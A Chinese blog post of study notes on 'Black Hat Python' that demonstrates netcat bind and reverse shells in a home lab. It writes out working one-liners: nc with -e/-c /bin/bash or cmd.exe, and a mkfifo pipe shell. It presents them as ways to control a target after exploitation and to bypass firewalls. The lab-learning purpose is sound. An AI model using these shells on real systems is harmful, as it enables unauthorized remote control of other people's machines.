《Python 黑帽子》学习笔记 - netcat 介绍2- Day 6

最新推荐文章于 2024-02-17 22:57:45 发布
最新推荐文章于 2024-02-17 22:57:45 发布
阅读量284 收藏
点赞数
分类专栏: 学习笔记 文章标签: Python黑帽子 bind shell reverse shell 命名管道
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36906509/article/details/79702986
版权

上篇笔记对 netcat(nc) 的 HTTP 请求,端口扫描和代理等功能进行了测试,本篇笔记继续测试 nc 其他一些常用功能。

在渗透测试中,最好的方式是能够获取反向 shell (reverse shell) 或正向 shell (bind shell). 反向 shell 是从目标主机将 shell 连接处于监听状态的攻击方的方式。正向 shell 是攻击方通过特定端口连接目标主机 shell 的方式。

正向 shell (bind shell)

如果我们渗透的目标,有独立的公网 IP 和 Port, 并在外部可以访问到,可以尝试通过远程正向 shell 来对目标进行控制,有了 shell 很多操作将会非常方便。一般来说,会使用 telnet (默认端口23) 或 ssh (默认端口22) 来进行远程 shell. 但出于安全原因,主机上这两个命令经常不会主动安装,安装的话也需要管理员权限。我们可以用 netcat 创建远程 shell 来解决。

nc 在服务端监听端口,并带上执行命令(-c-e)的选项。

root@kali:~# nc -lvvp 7777 -c /bin/bash

客户端连接服务端。

nc 192.168.1.7 7777

服务端收到客户端连接后即运行 shell, 接收客户端命令,完成客户端 与 shell 的数据交互。

Kali 为服务端,即被攻击主机,shell 为 /bin/bash

bind-shell

Win7 为服务端,即被攻击主机,shell 为 cmd.exe

bind-shell-win7

如果 nc 没有执行命令(-c-e)功能,还可以使用管道的方式来模拟绑定 shell 的功能,即把 shell 的输入输出数据放在命名管道里,并在客户端和服务端进行数据交互。步骤说明如下:

  1. 首先创建一个名为 fifo 的命名管道文件,命名管道文件可以读取等待,作为暂存 shell 输入输出数据的地方。
  2. nc -lvp 7777 服务端监听端口,等待接收客户端连接,完成数据通信。(注意:管道只是暂存数据,服务端和客户端的数据仍旧会按照 nc 的编码来进行传输。不会出现数据去了管道,不会在网络传输了。这样理解对吗?)
  3. shell 的输入来自客户端发送过来的命令,所以把 nc 监听端口收到的数据管道(|)至 fifo 文件 即 nc -lvp 7777 > /tmp/fifo.
  4. cat /tmp/fifo | /bin/sh 把 fifo 文件内容管道至 shell. 即把客户端发送过来的命令传给 shell 执行。(注意:管道使命令平行执行,fifo 文件可以读取等待,如果是普通文件,cat 命令会尽快结束,然后开始读取空文件)
  5. /bin/sh -i 2>&1 | nc -lvp 7777 shell 执行完相应命令后把结果,以及标准错误流(2)都转到标准输出流(1)上,并管道至 nc, 这样客户端就能接收到 shell 执行的结果或错误。这里 -i 参数会给出一个提示符 #.
  6. nc -lvp 7777 > /tmp/fifo nc 再次接收客户端传过来的命令,并管道至 fifo 文件。
  7. 客户端用 nc 连接服务端,发起连接并完成数据通信。nc 192.168.1.7 7777

以 Kali 为服务端,运行:

root@kali:~# mkfifo /tmp/fifo
root@kali:~# cat /tmp/fifo | /bin/sh -i 2>&1 | nc -lvp 7777 > /tmp/fifo
listening on [any] 7777 ...

win7 为客户端,运行:

nc 192.168.1.7 7777

客户端连接服务端后,能够得到服务端一个 shell.

bind-shell-fifo

关于 /bin/sh -i 2>&1 补盲以下知识点:

UNIX 有几种输入输出流,它们分别与几个数字有如下的对应关系:0-标准输入流(stdin),1-标准输出流(stdout),2-标准错误流 (stderr)。2>&1 的意思就是将 stderr 重定向至 stdout ,并一起在屏幕上显示出来。如果不加数字,那么默认的重定向动作是针对 stdout(1)的,比如 ls -l > result 就等价于 ls -l 1 > result. 这样便于我们更普遍性的理解重定向过程。

反向 shell (reverse shell)

如果我们渗透的目标,是一个内部网络的主机,外部不能直接访问其地址和端口,可以用 反向 shell 的方式来连接处于监听状态的攻击方主机,以更好的控制目标,反向 shell 经常用来绕过本地防火墙的限制。

攻击方监听端口。

nc -lvp 3333

被攻击主机启动 shell, 并通过 nc 来发送 shell 的命令和运行结果。

nc 192.168.1.2 3333 -e /bin/sh  # Kali 为被攻击主机
nc 192.168.1.2 3333 -e cmd.exe  # Win7 为被攻击主机

Win7 为攻击方,Kali 为被攻击主机,测试结果为:

reverse-shell-1

Kali 为攻击方,Win7 为被攻击主机,测试结果为:

reverse-shell-2

执行程序

上面的正向和反向 shell 都是执行程序的特例,我们还可以执行其他程序,这里以执行 calc.exe 为例进行测试,我测试的 nc 版本在结束执行的程序后,nc 也会自动断开连接。

exec-calc

总结

本篇笔记测试了 netcat 的正向和反向 shell 功能,尤其反向 shell 是最重要的控制主机的方式。在利用漏洞渗透目标后,最常用的方式就是启动一个 shell, 并传回攻击方,通过这个 shell 做更进一步的拓展。

下一步,分析书中的 netcat 代码,并用 Python3 进行实现。

参考

https://www.oschina.net/translate/linux-netcat-command?lang=chs&page=1#

信安工匠
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Python 帽子学习笔记 - netcat 介绍1- Day 5
信安工匠
03-24 827
netcat 被称为网络瑞士军刀,是一个功能强大设计优雅的网络工具。 netcat 介绍 netcat 是什么,引用 wiki 的说明如下: Netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connections usi...
Python 帽子学习笔记 - 原书 netcat 代码分析 - Day 7
信安工匠
03-27 3423
简单介绍netcat 的功能和运用后,开始学习理解该书中实现的 netcat 代码。 功能 从标准输入中读取数据,并通过网络发送数据。 上传文件。 执行命令。 命令行 shell. 实现 解析命令行选项和参数,根据选项设置相应功能标识及参数变量,如果选项和参数不正确打印帮助信息。 依据功能标识变量,设计调用功能函数的逻辑流程。主体包括两部分,向外连接和本地监听。 向外连接...
nc
diexian5592的博客
09-09 273
nc 用于设置路由器。执行本指令可设置路由器的相关参数。 nc [-hlnruz][-g<网关...>][-G<指向器数目>][-i<延迟秒数>][-o<输出文件>][-p<通信端口>][-s<来源位址>][-v...][-w<超秒数>][主机名称][通信端口...] -g<网关> 设置路由...
Netcat反向连接与反弹 Shell
最新发布
Kali与编程
02-17 1132
反向连接中,攻击者首先在自己的主机上启动一个监听程序,然后在目标主机上执行一个连接程序,该连接程序会连接到攻击者主机上的监听程序,并建立一个反向连接。在反向连接中,攻击者首先在自己的主机上启动一个监听程序,然后在目标主机上执行一个连接程序,该连接程序会连接到攻击者主机上的监听程序,并建立一个反向连接。假设我们要在目标主机上执行一个连接程序,连接到攻击者主机的IP地址为192.168.1.100,端口号为1234的监听程序,并执行一个shell。在目标主机上执行连接程序,并连接到攻击者主机的监听程序。
How to: Shellcode to reverse bind a shell with netcat(如何使用netcat进行shellcode反向链接)
Shellcode.Cool!
05-23 1502
Imagine you found a vulnerability in a web server and decided to take over that machine to do your dirty deeds, what do you do? Well, for starters, you have to figure out how to exploit the vulnerabil
网安学习之netccat的使用offensive security OSCP 4.1NetCat
m0_61835385的博客
09-04 105
在这种情况下,尽管Alice无法将端口绑定到计算机上的/bin/bash上,但她可以将命令提示符的控制权发送到Bob的计算机。在我们的第一个场景中,Bob(运行Windows)请求Alice(运行Linux)的帮助,并要求她连接到他的计算机并远程发出一些命令。为了完成这个场景,Bob需要将cmd.exe绑定到他的公共IP地址上的TCP端口,并要求Alice连接到他的特定IP地址和端口。一旦建立了连接,Alice的Netcat将重定向输入至/bin/bash,输出数据流到端口4444上的Bob的机器。
科普:Windows下Netcat使用手册
热门推荐
sdujava2011
07-20 4万+
本文转自https://www.91ri.org/7761.html,稍作修改,所有权力归原作者所有。 简介: 在网络工具中有“瑞士军刀”美誉的NetCat(以下简称nc),在我们用了N年了至今仍是爱不释手。因为它短小精悍(这个用在它身上很适合,现在有人已经将其修改成大约10K左右,而且功能不减少)。 参数格式 连接到某处: nc [-options] hostnam
浅谈Python帽子取代netcat
09-20
本篇文章通过一个小小实例给大家分析了Python帽子取代netcat的过程以及相关知识点,对此有兴趣的朋友可以学习下。
ansible-role-netcat:安装Netcat的Ansible角色
04-10
Debian提供了netcat-openbsd或netcat-traditional ,其中的那些未移植/编译到CentOS。 这就是为什么我决定只允许安装以上两个版本的原因,因为这两个版本同存在于Debian和CentOS中。 因此,您将在所有计算机上...
netcat.py:netcat.py-python(2 + 3)netcat
05-09
[]:{{{1 File : README.md ...netcat.py-python(2 + 3)netcat 有关代码,请参见netcat.py (带有示例)。 例子 $ ./netcat.py -l -p 8888 # server hi client! # typed on stdin hi server! # from client ^C
Python库 | netcat-ntt-1.0.0.tar.gz
05-19
资源分类:Python库 所属语言:Python 资源全名:netcat-ntt-1.0.0.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
读书笔记 -《Python 帽子》 ( 一 )
指甲的专栏
02-18 1万+
读书笔记系列文章一直都在读书,读了忘,忘了再读。不如把每次学到的东西都写下来 python帽子 black hat python 客与渗透测试
Python 帽子学习笔记 - 网络基础1 - Day 2
信安工匠
03-20 3276
不管是做软件开发还是信息安全,理解和用好 socket,是网络编程的基础,是编写与网络相关脚本工具的前提,本章使用 Python 的 socket 模块,创建 TCP 和 UDP 服务端及客户端。并实现了 netcat,TCP 代理等工具,是学习后续知识的铺垫。 作者提到,在目标网络环境下,可能没有开发环境,甚至不会有互联网条件,但是如果目标安装了 Python,利用 Python创建网络...
Python 帽子学习笔记 - hex dump - Day 9
信安工匠
03-30 2456
作者在实现 TCP 代理脚本的候,提到一个 hex-dump 的函数。非常经典的一段代码,看上去很美。 hex-dumper Pyton2 代码: def hexdump(src, length=16): result = [] digits = 4 if isinstance(src, unicode) else 2 for i in xrange(0,...
Python 帽子学习笔记 - SSH 端口转发 - Day 12
信安工匠
04-03 1011
本篇笔记学习 SSH 端口转发功能。 本地环境说明: 主机1:Win7,IP(192.168.1.9),Web 服务(80)。 主机2:Kali,IP(192.168.1.10),SSH 服务(22)。 主机3:OWASPBWA,IP(192.168.1.11),SSH 服务(22),Web服务(80)。 由于主机3没有图形化,操作 shell 终端不方便,我用 xshell 工具连接其...
Python 帽子学习笔记 - Python3 实现 netcat - Day 8
信安工匠
03-29 976
原书的代码主要考虑的是如何实现功能,在字符编码,socket 阻塞和数据交互,异常处理等方面存在一些问题,造成了程序功能不完善,逻辑出差和退出等情况。 本篇笔记记录用 Python3 实现原书的 netcat, 脚本功能和步骤主要是参照原书的实现思路,会对部分代码的逻辑进行更合理的调整,并学习字符编码,异常处理,调试日志记录等知识点。 功能和实现思路见上一篇笔记Python3 代码 ...
Python 帽子学习笔记 - 网络基础2- Day 3
信安工匠
03-21 795
上一篇笔记的补充: 为了验证 socket 状态的问题,可以在主机操作系统和 VMware kali 客户机系统运行TCP 服务端和客户端程序,通过查看两个主机的网络连接进行理解。 我在主机操作系统(Win7)用 phpstudy 搭建了 Web 站点,客户机通过浏览器或 netcat 连接服务端。分别在两台机器上用 netstat 查看 TCP 连接。注意的是,VMware 网卡要使用桥接...
Python 帽子学习笔记 - 准备 - Day 1
信安工匠
03-19 730
信息安全是一个有意思的方向,也是自己的爱好,从零开始,想在工作之余把这个爱好培养为自己的技术能力,而 web 安全相对来说容易入门些,于是选择 web 渗透测试作为学习的起点,并选择同样是容易入门的 Python 作为编程工具,潜心学习,持续学习,做一个 Pythonic 的信安工匠。 借 “Python之禅读书群” 发起的读书活动,选了《Python 帽子 客与渗透测试编程之道》开始学习和...
代码审计入门笔记—分析一个旧版本 espcms SQL 注入漏洞
信安工匠
05-02 725
最近在读《代码审计:企业级 Web 代码安全架构》,作者是尹毅。 我的想法是,精读这本书,从而入门 PHP 代码审计,能够利用工具检测一些轻量级 CMS 的漏洞,分析代码逻辑,理解漏洞原理,尝试编写 POC 和 Paper。学习过程中做好笔记,举一反三,总结提高。 笔记主要记录漏洞的形成原理和利用方法,这会比较难,但只有这样才能提高,希望自己能够坚持这个原则,真正学懂代码审计,也提高逻辑推理和...
python netcat
08-16
Python Netcat是通过Python实现的Netcat工具。Netcat是一种通用的网络工具,它可以实现TCP/UDP连接的建立,文件传输以及端口扫描等功能。利用Python实现Netcat可以方便地进行网络通信和测试。一个常见的用法是使用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值